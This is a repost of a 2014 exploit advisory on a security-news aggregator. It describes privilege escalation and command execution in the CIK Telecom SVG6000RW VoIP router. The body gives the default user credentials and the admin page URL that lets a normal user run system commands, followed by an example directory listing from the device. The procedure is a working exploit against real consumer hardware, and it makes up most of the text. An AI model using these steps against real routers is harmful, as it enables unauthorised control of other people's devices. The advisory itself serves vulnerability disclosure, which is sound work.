HackDig : Dig high-quality web security articles for hackers

CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution

2014-12-17 19:05
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################

Description:
CIK Telecom VoIP router SVG6000RW has a Privilege Escalation vulnerabilitie
and can lead to Command Execution.


Exploit:

1) Login as a normal user
Default Username: User Password:cikvoip

2) change URL to http://URL/adm/system_command.asp
and now u can run commands.


Example:

Command: ls /etc_rw/web

Result:

internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm




Source: 65553/stiolpxe/moc.bd-tiolpxe.www

Read:8237 | Comments:0 | Tags:webapps

“CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools